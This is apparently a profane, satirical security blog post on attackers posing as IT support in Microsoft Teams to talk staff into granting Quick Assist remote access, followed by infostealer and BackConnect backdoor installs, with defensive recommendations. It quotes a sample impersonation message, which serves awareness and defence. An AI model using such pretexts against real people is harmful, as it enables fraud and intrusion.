Teams & Quick Assist: Microsoft’s New Gift to Cybercriminals Everywhere

You know how Microsoft keeps banging on about collaboration tools being the future of work? Well, it turns out they accidentally built the future of cybercrime at the same time. Meet the unholy duo: Microsoft Teams and Windows Quick Assist — the Bonnie and Clyde of corporate security breaches.

Since late 2024, cybercriminals have been absolutely rinsing these tools to break into businesses, steal data, and spread malware faster than HR spreads 'mandatory wellbeing' emails. Trend Micro found 21 confirmed breaches in North America alone, plus another 18 in Europe — all thanks to a combination of bad design, bad training, and the unshakable human instinct to trust anything with a Microsoft logo.

How This Absolute Shitshow Works

Step 1: Social Engineering for Dummies

The attacker starts by impersonating IT support on Teams. They message someone in accounts (who has just enough technical knowledge to be dangerous) and say something like:
"Hi Sandra, this is Dave from IT Security. We’ve detected suspicious login attempts on your account. Can we do a quick check using Quick Assist?"

Sandra, who has already had 57 phishing awareness emails this year, thinks: “It’s on Teams, so it must be legit”. Because if you stick a company logo on something, people will believe it’s from God himself.

Step 2: Weaponised Trust (aka Quick Assist Is a Cybercriminal’s Wet Dream)

Quick Assist — for anyone lucky enough to have never used it — is a built-in Windows remote control tool designed to help IT support staff remotely fix problems. It’s like TeamViewer, but shit.

Because it’s a Microsoft tool, it breezes right through corporate security. No one questions it. Users happily copy-and-paste connection codes into chats like they’re swapping biscuit recipes. Once the attacker has remote access, it’s game over. They can:

• Install malware (usually a lovely infostealer or a sneaky backdoor called ‘BackConnect’ — because why settle for just robbing you once?)

• Steal passwords (because who doesn’t store them in a plain text file called ‘passwords.docx’?)

• Exfiltrate data (bonus points if you save everything to ‘OneDrive for Business’ — makes life even easier for the bastards)

• Disable your security software (because Quick Assist runs with admin rights, obviously — why wouldn’t it?)

Step 3: The Long Con (Persistent Access for Ongoing Fuckery)

After the first breach, the attackers don’t just bugger off and count their winnings. Oh no. They drop BackConnect, a nasty little backdoor that gives them persistent, SYSTEM-level access to your machine.

With BackConnect, they can log back in anytime they fancy — day, night, bank holiday, doesn’t matter. Your PC is now a hotel room for hackers, permanently reserved for shady activities. If you wipe the malware, no worries — they’ll just social engineer you again because you’re still trusting Teams messages from "Dave in IT".

But It’s Teams — Surely That’s Safe?

Oh, you sweet summer child. Teams is basically email with emojis, and it’s just as insecure. Microsoft loves to pretend Teams is some fortress of collaboration, but in reality:

• Anyone with an Office 365 account can message you (if you don’t lock it down — which you probably haven’t).

• External users can join chats with confusing ‘guest’ labels that half your staff don’t understand.

• Microsoft’s own phishing detection barely touches Teams, because nobody in Redmond considered that criminals might use their collaboration tool to collaborate on crimes.

Who’s Getting Screwed?

Pretty much everyone, but the favourites include:

• SMBs with overstretched IT teams who think "security awareness training" is enough protection.

• Finance departments because they’ve got the juicy payment data.

• Anyone who works remotely because home routers are the digital equivalent of a rusty padlock.

• Anyone who uses ‘password123’ (they deserve it, frankly).

Microsoft’s Response: Shrug Emoji

To their credit, Microsoft did eventually notice that their own tools were being used to fuck over their own customers. Their advice? A deeply unhelpful mixture of:

• “Train your staff to be suspicious” (cool, because that always works)

• “Consider restricting Quick Assist access” (why the fuck wasn’t this the default?)

• “Enable Teams Safe Links” (assuming your business pays for E5 licensing, which most don’t)

It’s classic Microsoft: Build a hole, sell the ladder separately.

What’s Actually Needed

If you want to avoid becoming the next Trend Micro case study, here’s what you actually need to do:

1. Turn Off Quick Assist Everywhere

Unless you absolutely need it, bin it. There are better remote tools, and frankly, trusting anything with ‘Quick’ in the name to handle security is a fucking joke.

2. Lock Down External Teams Access

Only allow pre-approved domains to message your staff. External messages should be off by default. If your company genuinely needs to talk to suppliers on Teams, create a guest tenant just for that. Don’t let every random bastard with an @hotmail.com account message Sandra in accounts.

3. Teach Staff to Verify EVERYTHING

If "Dave from IT" messages you out of the blue, call the actual IT team and verify it. If Dave gets offended, he can fuck right off. Real IT staff should love being questioned — it shows the training worked.

4. Monitor for Suspicious Quick Assist Usage

If Quick Assist gets launched on a machine where IT never uses it, that’s a red flag the size of Wales. Log every remote session and review them regularly. And if someone tries to launch it while chatting with a random external contact on Teams — shut it down faster than a pub after last orders.

5. Deploy EDR That Actually Works

Endpoint Detection and Response (EDR) tools should be set to panic mode if Quick Assist launches from outside the corporate VPN. And if the process then downloads random files called settingsbackup.dat, set something on fire — you’re already breached.

Final Thought

This whole thing is textbook Microsoft: Build a shiny tool, market the shit out of it, completely forget to think about how criminals will abuse it, and then blame the customer when it all goes tits up.

Microsoft’s love affair with collaboration has turned Teams into the world’s friendliest malware delivery platform, and Quick Assist into a remote access trojan that’s already installed on every Windows machine by default. And somehow, this isn’t front-page news — because everyone’s too busy arguing about Windows 11 Start Menu layouts to notice that their entire company is now one fake Teams message away from absolute ruin.

TL;DR:

• Quick Assist is malware with a Microsoft logo.

• Teams is phishing with emojis.

• Your staff will fall for it because humans are trusting idiots.

• Turn both off, or prepare to join the long, embarrassing list of breached companies blaming Dave from accounts.